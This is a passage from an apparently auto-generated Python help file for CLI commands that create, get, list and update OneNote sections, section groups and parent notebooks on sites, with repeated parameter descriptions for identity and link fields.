changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in sites" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for sites" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for sites" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from sites" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from sites" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from sites" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from sites" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in sites" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API 